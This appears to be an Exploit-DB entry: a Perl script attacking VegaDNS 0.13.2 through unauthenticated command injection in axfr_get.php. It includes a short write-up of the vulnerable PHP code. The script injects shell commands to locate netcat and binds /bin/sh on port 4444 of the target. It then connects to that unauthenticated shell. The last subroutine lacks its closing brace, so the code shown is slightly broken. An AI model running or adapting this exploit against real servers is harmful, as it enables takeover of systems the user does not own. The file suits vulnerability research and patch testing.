VegaDNS 0.13.2 - Remote Command Injection

EDB-ID:

40402

CVE:

N/A


Platform:

PHP

Published:

2016-09-20

#!/usr/bin/perl
                                                                                                                                                                       $izd= qq{
  ██╗███████╗██╗   ██╗███╗   ██╗ █████╗     ██████╗ ██████╗  ██████╗ ██████╗
  ██║╚══███╔╝██║   ██║████╗  ██║██╔══██╗    ██╔══██╗██╔══██╗██╔═══██╗██╔══██╗
  ██║  ███╔╝ ██║   ██║██╔██╗ ██║███████║    ██║  ██║██████╔╝██║   ██║██████╔╝
  ██║ ███╔╝  ██║   ██║██║╚██╗██║██╔══██║    ██║  ██║██╔══██╗██║   ██║██╔═══╝
  ██║███████╗╚██████╔╝██║ ╚████║██║  ██║    ██████╔╝██║  ██║╚██████╔╝██║
  ╚═╝╚══════╝ ╚═════╝ ╚═╝  ╚═══╝╚═╝  ╚═╝    ╚═════╝ ╚═╝  ╚═╝ ╚═════╝ ╚═╝
                                                                                                                                                                       };$vg=qq{
         ▀  ▐░░▄                    ▄▄▄▄▄▄▄
     ▀▀  ▄░  ▐▀▄▀▄              ▄▄▓▓▓▒▒▒▒▒▒▓▓▄
 ▀▀▀ ▐▄▄░  ▀▐▄ ▄▀▄ ▄         ▄▄▀▀▀ ▀▀▓▓▓▓▒▒░▒▓▓▌
        ▀ ▄  ▐▀▄  ▀▄░       ▄▄░░      ▀▓▓▓▓▓▓▓▓▓▌
             ▐▀▄▀▄  ▀▀▄▀▄   ▓▌░░     ▄▄▐▓▀▓▓░▀▓▓▓▌
              ▀▄▀▄▀▄░ ▐▀▄▀▄  ▐▓▒▄▄ ░▓▀ ▐▀▄▀▒▄▄▒▀▓▓▓▄      ▄▄▄▓▓▓▓▄▄▄
                ▀ ▀▄▀▌▄░ ▀▄▒▄ ▐▀▓▓       ░░ ▒░░   ▀▀▒▒▒▓▓▒░░░    ░░▒▒▄
                  ▀ ▀ ▐▌ ░█░ ▒▌▐▀▄░▄      ▒░▒░░      ░░▒░           ░░▓
                    ▐▄ ░░░ ░▒░░▒▌ █▄▒░▄  ▄▓▒░  ▐░░ ░░░▒░             ░░
                   ▓▓░▄▓ ░▒░  ░░▐▓  ██▓▓▓▓▓░▄▄ ▐░░░▒▄▒░░░   ░      ░░░░
                    ▀█▓▒▓▓ ░░░░ ░█▒▓▒▒▒▒███▒█▒▒░▒░▐▓▒░░░░░░░ ░   ░░▒▒▒░▒
                         █░░  ░▒▒░░█▒▒░░░░░ ░░░░░▐▓▒░░░ ░░░ ░░░▒▒▒█░ ░▒▒
                     ▐▒▒▒  █▒▓▌░░░ ░░░▒▒▒░░░░▒▓▓▒██▀▀░░ ░░  ░ ░░▒░░░  ░▒
                 ▓▒░░▐▒░ ░▓  ██▌░░░▄▒▒░░▒▒▒░▒▒▓▓░░     ░░░░▒▄░░▒░░    ░▒
                ▓▒ ░▒▒▒█ ░▒▓  ▐▒▓░▒▒░  ▐░░ ▀▒▒▒░░░   ░   ▐░░▒▒▒     ░ ░
               █░▀▒▒▓▓▓▒▒░░▓ ▄▒░ ▀▒░░░░   ░    ░░░░░    ░░▒▒▒    ░   ▒▒
                ▀▓▓▀░▓▌▒░▒  ░▒▓▓▓▒▒▒░░░░         ░    ░░▒▒░  ░      ░░▒
                  ▀▀▓▓▌▀░  ░ ░▐▓▓▓▒▓▓▓▄░░░▄     ▐░░░▒▒▒▀ ▐░▒▄░    ▐░░░▒
                      ▐▒▒░░▄▓▓░▌  ░▒▒▓▓▓▓▒░░░ ░▒░▒▓▒▒░▒░░░░░▒░   ░░▒▒▒▓
                       ▀▓▓▀▒▄░░░░░ ░▒▒▓▓▌▀▀▓▓▄▓▒▓░░▒▒░░░▒▓▒▓▓▀▀▀▀▀▀▀▀▀▓▓▄
                         ▓▒░░░▄   ░░▒▓▀       ▀▓▓▓▒▒▓▓▓▓▀░░▒▒▒▀▓▓▓▓▀▀▀▀▓▓
                          ▀▓▄▒▒▒░░░▒▓          ▐▓▓▓▓▓▒▒▒▓▓▀▒▒▒▀▀░░░░░▒▒▒▓▓▓▄
                             ▀▀▀▀  ▀           ▐▓▓▓▀▀▀▀░░░░▒░░▒▒▒▓▓▓▓▒▀▀▀▓▓▌
                                             ▄▓▓▓▓▀▀▓▓▓▓▓▓██▀▀▀░░░░░     ▒
                                            ▓▒▒▓▌░░░░░░░▒▌░░░░ ░   ░  ▀  ░▄
                                           ▓▓▓▓▒▌▄░▒▒▒▒▓▒░░░░▀   ░░░   ░░░▒▌
                                          ▄▓▀▀░░░▒▒▄▒▒▓▓░░▄▒░░░▄▄▄▄  ░░░░░▐░
                                      ▄▐█▒  ▒░▒▒▒▒░░▓▓▓▒▓▓▓▒▒▒▀░░▀   ▀  ░░▒▌
                                  ▄▓▒▒░░░░░░▒▒▒▒▒░▒▓▓▓▓▓▓▓▒▒░   ░    ░  ▒▒█▀
                               ▐▓▒░░░░░░░▒▒▒▒▒▒░▒▓▓▓▓▓▓▓▓▒▌    ░  ▐░ ░  ░▒
                             ▐▒░░░░░░▒▒▒▒▒▒░░▓▓▓▓▓▓▓▓▓▓▓▒▌░   ░   ▐░░░  ░█
                          ▒█░░░░░░▒▒▒▒░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒▌   ░   ▐░░░ ░░▒
                      ▐▓▒░▒░░░░░▒▒▒░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ ▒▒░░      ░░░░ ░░▒
                   ▄▓▒▒▒░░░░░░░░░░░▓░▓▓▒▓▓▓▓█▀▒▓▓▓▓▓▓▓▓▒░      ░░░░  ░░
                  ▄▒░░░░   ░░░░▒▒▓▓▓▓██▌▐▓▓▓░░▓▓▌░▓▓▓▓▒░  ░  ░░░░  ░░▒
                  ▒░░░░░░▒▒▓▓▓▓▓▓▓█    ▐▓▓▓▓░░░▒▌░▓▓▓▓▒░  ░ ░░░░  ▐▒▌
                 ▒▀░░░▒░░▓▒▓▓▓▓▓▌▀     ▐▓▓▓▓░░░▒▌░▓▓▓▓▒░ ░ ░░░░  ░▒▌
                 ▓ ░▒░░░▀▀▒▓▓▓▓▓▌      ▐▓▓▓ ░░░░░░▓▓▓▓▒░ ░ ░ ░ ░▒▒▌
                ▓▓▒░▒░░▒▒▒▓▓▓▓▓▓▌           ▀▓▓▓▓▓▓▓▓▒░  ░░░ ░▄░▒▓▌
                 ░ ▀▒▓▓▓▓▓▓▓▓▓▌▀▀                   ▒░      ░ ░░▓▓▄
                 ░        ▓                        ▓▒░       ░░▒▀▒░▒▄
                ▄     ░  ▀                          ▓▒░░▄░░░░░▀░░░▌░░▒
                ░     ▄▄▀                            ▀▒▒▒▒▒▄ ▄░░░░  ▀▀
                     ░░░                              ▓▓▓▒▒▓▄░░ ░ ▐░▄ ░
               ░   ░▀░░                               ▀▀▒▒▒▒▀       ▀▒ ▄
         ▄▄▄▄▄▄   ▄▀▒▓▌▄                                   ▀▄        ░ ░
         ▓▓▓▓▌▄  ▄▓▓▓▓▓▓▓                                    ▒ ▄      ░ ▄
         ▓▒▒▓▓▓▓▓▓▓▓▒▓▓▓▓▓                                       ░    ▀▓ ▄
         ▓▒▒▓▓▓▓▓▓▒▓▓▓▓▓▀                                          ░   ▀▄░▒▌▄▄
     ▄▄▄▓▓▓▓▓▓▓▓▓▓▓███▀                                            ▄▓▄▄▄▄▄▒▓▓▓▓▄
 ▄▓▓▓▓▓▓▓▓▓▒▓▓▓▓▓█                                               ▐▓████▓▓▓▓▓▓▒▓▓
▓▓▓▓▄▄▄▄▓▓▓▓▓▓▓█                                                  ▐▓░░░▒▓▓▓▓▒▓▓
                                                                  ▐▓▓░▒▓▓▓▓▓▓▓
                                                                  ▐▓▓▓▓▓▓▒▒▓▌
                                                              ▓▓▓▓█▒▒▒▒▒▒▒▓▓▌
                                                             ██▒░░░░░░░▓▓███

                                                                                                                                                                        };$b=qq{
  ██╗   ██╗███████╗ ██████╗  █████╗ ██████╗ ███╗   ██╗███████╗
  ██║   ██║██╔════╝██╔════╝ ██╔══██╗██╔══██╗████╗  ██║██╔════╝
  ██║   ██║█████╗  ██║  ███╗███████║██║  ██║██╔██╗ ██║███████╗
  ╚██╗ ██╔╝██╔══╝  ██║   ██║██╔══██║██║  ██║██║╚██╗██║╚════██║
   ╚████╔╝ ███████╗╚██████╔╝██║  ██║██████╔╝██║ ╚████║███████║
    ╚═══╝  ╚══════╝ ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚═╝  ╚═══╝╚══════╝


  ██████╗ ███████╗███╗   ███╗ ██████╗ ████████╗███████╗
  ██╔══██╗██╔════╝████╗ ████║██╔═══██╗╚══██╔══╝██╔════╝
  ██████╔╝█████╗  ██╔████╔██║██║   ██║   ██║   █████╗
  ██╔══██╗██╔══╝  ██║╚██╔╝██║██║   ██║   ██║   ██╔══╝
  ██║  ██║███████╗██║ ╚═╝ ██║╚██████╔╝   ██║   ███████╗
  ╚═╝  ╚═╝╚══════╝╚═╝     ╚═╝ ╚═════╝    ╚═╝   ╚══════╝


  ███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗    ██████╗ ██╗   ██╗
  ██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝    ██╔══██╗╚██╗ ██╔╝
  █████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║       ██████╔╝ ╚████╔╝
  ██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║       ██╔══██╗  ╚██╔╝
  ███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║       ██████╔╝   ██║
  ╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝       ╚═════╝    ╚═╝


                                         ▄
                                  ▄█▀      ▀█▄▄
                             ▄▄▓▀▀             ▀▓▄▄
                          ▄▓▓▀                    ▀█▓▄
                       ▄▓▓▀                          ▀▓▓▓▄
                    ▄▓▓█▀                               ▀▓▓▄▄
                 ▄▓▓▓▀                                    ▀▓▓▓▄
               ▄▓▓▓▀                                        ▀▓▓▓▓
             ▓▓▓▓▀                                            ▀▓▓▓▓▄
           ▓▓▓▓█                                                ▀▓▓▓▓
          ▐▓▓▓▀                                                   ▓▓▓▌
           ▓▓▓▌                                                  ▐▓▓▓
            ▓▓▓▌                                                ▄▓▓▓
             ▓▓▓▓                                              ▄▓▓▓
              ▓▓▓▓▓▓▓▓▓▓██                            ██▓▓▓▓▓▓▓▓▓▓
               ▀▀▀▀      ▄▄▄▄▄▄▄▄▄▄▄        ▄▄▄▄▄▄▄▄▄▄▄       ▀▀█
                ▄▄▓▓▓▓▓▓▓▓▓▓▓████▓▓▓▓▓▀   ▓▓▓▓▓████▓▓▓▓▓▓▓▓▓▓▓▄▄
            ▄▓▓▓▓█▀▀▀              ▓▓█    ▐▓▓              ▀▀▀█▓▓▓▓▓
             ▓▓▓                  ▐▓█      ▀▓▌                  ▓▓▓
              █▓▌                 ▓▀    ▌   ▀▓                 ▐▓▓
               ▀▓  ▄          ▄▀ ▐   ▌ ▓▓ ▐▄  █ ▀▓▄         ▄▌ ▓▀
                 █ ▀▓▄     ▄▓█     ▄▓ ▐▓▓▌ █▓     ▀▓▄▄    ▄▓▀ ▓
              ▄▌     █▓▓▓▓▓▀      ▓▓▓▄▓▌▐▓▄▄▓▓      ▀▓▓▓▄▓▓▀    ▐▄
             ▓▓        █▀▀                             ▀█▀       ▀▓
            ▓▓           ▄  ▄▀                     ▄   ▄          ▓▓
           ▓▓▓▄       ▄▓▀ ▄█    ▄              ▄    ▀▄ ▀▓▄        ▓▓▓
          ████▀▀▀▀▀▀▀▀▀  ▓▀  ▄ ▄                ▓ █   ▓  ▀▀▀▀▀▀▀▀▀████
                       ▄▓▀  ▓ ▄▌▐     ▐  ▌     ▌▐▓ ▓   ▓▄
                      ▄▓ ▄▄▓▌▐▓ ▐   ▓ ▓  ▓ ▐▄  ▌ ▓▌▐▓▄▄ ▓▓
                     ▓▓▓█▀▀  ▀█▓▓▌ ▓ ▐▓  █▌ ▓  ▓▓█▀  ▀▀█▓▓▓
                    █▀          ▀ ▐▓▄▓▌  ▐▓▄▓▌ ▀          ▀█
                                     ▀    ▀▀


         ___ .___ .______  ._______._____  .___.__  ._______  .____     .___
.___    |   |: __|: __   \ : .____/:_ ___\ :   |  \ : .___  \ |    |___ |   |
:   | /\|   || : ||  \____|| : _/\ |   |___|   :   || :   |  ||    |   ||   |
|   |/  :   ||   ||   :  \ |   /  \|   /  ||   .   ||     :  ||    :   ||   |/\
|   /       ||   ||   |___\|_.: __/|. __  ||___|   | \_. ___/ |        ||   /  \
|______/|___||___||___|       :/    :/ |. |    |___|   :/     |. _____/ |______/
        :                           :   :/             :       :/
        :                               :                      :

                                                                                                                                                                        };$g=qq{

   ██████╗ ██████╗ ███████╗███████╗████████╗███████╗
  ██╔════╝ ██╔══██╗██╔════╝██╔════╝╚══██╔══╝╚══███╔╝
  ██║  ███╗██████╔╝█████╗  █████╗     ██║     ███╔╝
  ██║   ██║██╔══██╗██╔══╝  ██╔══╝     ██║    ███╔╝
  ╚██████╔╝██║  ██║███████╗███████╗   ██║   ███████╗
   ╚═════╝ ╚═╝  ╚═╝╚══════╝╚══════╝   ╚═╝   ╚══════╝

To all the people with mad skills who share their knowledge:

  TecR0c, mr_me, action_dk, bcoles, TheColonial, jduck, hdmoore, rgod, TESO,
  mdowd, kernelpool, silviocesare, egyp7, w00 w00, felinemenace, corelan,
  lgandx, _sinne3r, alexsotirov, fjserna, solardiz, l0pth, cDc, therealsaumil,
  laughing_mantis, g0tm1k, nmrc, and many many more....

                                                                                                                                                                        };$a=qq^

   █████╗ ███╗   ██╗ █████╗ ██╗  ██╗   ██╗███████╗██╗███████╗
  ██╔══██╗████╗  ██║██╔══██╗██║  ╚██╗ ██╔╝██╔════╝██║██╔════╝
  ███████║██╔██╗ ██║███████║██║   ╚████╔╝ ███████╗██║███████╗
  ██╔══██║██║╚██╗██║██╔══██║██║    ╚██╔╝  ╚════██║██║╚════██║
  ██║  ██║██║ ╚████║██║  ██║███████╗██║   ███████║██║███████║
  ╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚══════╝╚═╝   ╚══════╝╚═╝╚══════╝l

VegaDNS is a tinydns administration tool written in PHP to allow easy
administration of DNS records through a web browser.
-- http://www.vegadns.org


The file axfr_get.php allows unauthenticated access and fails to correctly
apply input escaping to all variables that is based on user input. This
allows an attacker to inject shell syntax constructs to take control of the
command execution.

The following code from axfr_get.php shows how the variable $file becomes
tainted trough the $domain variable which is tainted from direct user input.
The application tries to prevent this by escaping the $domain and $hostname
variables, but fails to escape the $file variable.

---------------------------cut---------------------------
 * NOTE:
 *          This functionality ONLY exists outside of the main application
 *          because tcplient kept dying fatally due to file descriptor 7
 *          being unavailable, which only occurs AFTER session_start() is
 *          called.
 *
 */
require_once 'src/config.php';
// CHECKS
// Make sure the hostname was given
if(!isset($_REQUEST['hostname']) || $_REQUEST['hostname'] == "") {
    echo "ERROR: no hostname given\n";
    exit;
}
// Make sure that some domains were given
if(!isset($_REQUEST['domain']) || $_REQUEST['domain'] == "") {
    echo "ERROR: no domain was supplied\n";
    exit;
}
$domain = $_REQUEST['domain'];
$hostname = $_REQUEST['hostname'];
$rand = rand();
$file = "/tmp/$domain.$rand";
$command = "$dns_tools_dir/tcpclient -R '".escapeshellcmd($hostname)."' 53 $dns_tools_dir/axfr-get '".escapeshellcmd($domain)."' $file $file.tmp 2>&1";
exec($command, $out);
---------------------------end---------------------------

  ███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗
  ██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝
  █████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║
  ██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║
  ███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║
  ╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝
                                                                                                                                                                              ^;

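# --- main ------------------------------------------------------------------
# Usage: perl <this file> http://host/path/to/vegadns
# Everything here talks to the target over HTTP through curl and, on
# success, hands the terminal to a netcat connection; there is no
# computable result to test in isolation.
print "$izd\n" . (" " x 17) . "VegaDNS pre-auth RCE exploit by \@Wireghoul\n";
print "  " . ("=" x 50) . "[justanotherhacker.com]==\n";

# The single argument is the base URL of the VegaDNS install. The host part
# is captured for the final netcat connection; anything that is not
# scheme://host[...] goes to usage() (defined at the end of the file).
usage() if !defined $ARGV[0] || $ARGV[0] !~ m!.+://([^/:]+)!;
my $h = $1;

# Run curl without a shell and return the response body ('' if curl could
# not be started). The URL is built from the command-line argument plus the
# payload, and the original backtick form, `curl -s -k '$url'`, let a single
# quote in ARGV[0] break out into *our* shell. -k skips TLS certificate
# checks (targets are frequently self-signed); @extra is prepended so the
# caller can pass a timeout.
sub http_get {
    my ($url, @extra) = @_;
    open(my $fh, '-|', 'curl', @extra, '-s', '-k', $url) or return '';
    local $/;
    my $body = <$fh>;
    close $fh;
    return defined $body ? $body : '';
}

print "  . . . Locating netcat\n";
# First injection: run `which nc` on the target and read its output back.
# PHP decodes '+' to a space and %3b to ';'; the ';' terminates the
# tcpclient command because axfr_get.php pastes $domain unescaped into the
# $file arguments. 'izunadrop' and 'agev' are filler.
my $probe = $ARGV[0] . "/axfr_get?hostname=izunadrop&domain=%3bwhich+nc%3bagev";
my $body  = http_get($probe);

# The response is whatever the page prints, not just the path: pull out the
# first absolute path ending in /nc. The original interpolated the raw
# response into the second payload, which breaks as soon as the page returns
# anything beyond the bare path (even a trailing newline).
my ($nc) = $body =~ m{((?:/[\w.-]+)*/nc)\b};
if (!defined $nc) {
    print "  ! ! ! netcat not found! Manual exploitation required:\n";
    print "        $ARGV[0]/axfr_get?hostname=izunadrop&domain=%3bCMD%3b\n";
    exit 1;
}
print "  . . . netcat found: $nc\n";
print "  . . . Performing IZUNA DROP!\n";
#  ← · ↑ · → · ↓ · ↖ · ↗ · ↘ · ↙
print "      ↓ ↓ ↑ *k* → → *p*\n";

# Second injection: bind /bin/sh to TCP 4444 on the target.
# NOTE(review): `nc -e` is not present in every netcat build; if no listener
# appears, fall back to the manual URL above with a payload the target's nc
# supports. The resulting shell is unauthenticated -- anyone who can reach
# port 4444 gets it -- so kill it when done.
# exec() blocks on the listener, so curl is told to give up after three
# seconds (-m 3). The trailing " &" sat inside the quoted URL in the
# original, so it reaches curl (and the target's query string) rather than
# backgrounding anything; it is kept for fidelity.
my $payload = $ARGV[0] . "/axfr_get?hostname=izunadrop&domain=%3b$nc+-e+/bin/sh+-lp+4444%3bagev";
http_get("$payload &", '-m', '3');
print $vg . "\n";
print "  . . . K.O ! ! ! Connecting to bindshell on $h port 4444\n";
# List-form system(): $h comes straight from the command line and must not
# pass through a shell (the original "nc -v $h 4444" did).
system('nc', '-v', $h, '4444');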
sub usage { print "Usage $0 http://host/path/to/vegadns\n\n$ARGV[0]"; exit;